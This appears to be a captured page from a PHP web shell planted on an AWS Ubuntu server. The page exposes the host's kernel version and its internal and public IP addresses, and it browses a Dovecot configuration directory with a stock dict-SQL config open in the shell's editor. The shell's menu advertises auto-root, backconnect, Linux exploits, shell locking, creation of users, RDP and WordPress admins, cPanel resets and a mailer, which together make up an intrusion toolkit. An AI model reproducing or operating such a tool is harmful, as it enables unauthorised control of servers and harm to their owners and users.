Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 13.59.144.10
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
dovecot /
[ HOME SHELL ]
Name
Size
Permission
Action
conf.d
[ DIR ]
drwxr-xr-x
protocols.d
[ DIR ]
drwxr-xr-x
stopwords
[ DIR ]
drwxr-xr-x
dh.pem
769
B
-rw-r--r--
dovecot-dict-auth.conf.ext
1.47
KB
-rw-r--r--
dovecot-dict-sql.conf.ext
852
B
-rw-r--r--
dovecot-openssl.cnf
542
B
-rw-r--r--
dovecot-sql.conf.ext
5.69
KB
-rw-r--r--
dovecot.conf
4.3
KB
-rw-r--r--
mkcert.sh
862
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dovecot-dict-sql.conf.ext
# This file is commonly accessed via dict {} section in dovecot.conf #connect = host=localhost dbname=mails user=testuser password=pass # CREATE TABLE quota ( # username varchar(100) not null, # bytes bigint not null default 0, # messages integer not null default 0, # primary key (username) # ); map { pattern = priv/quota/storage table = quota username_field = username value_field = bytes } map { pattern = priv/quota/messages table = quota username_field = username value_field = messages } # CREATE TABLE expires ( # username varchar(100) not null, # mailbox varchar(255) not null, # expire_stamp integer not null, # primary key (username, mailbox) # ); map { pattern = shared/expire/$user/$mailbox table = expires value_field = expire_stamp fields { username = $user mailbox = $mailbox } }
Close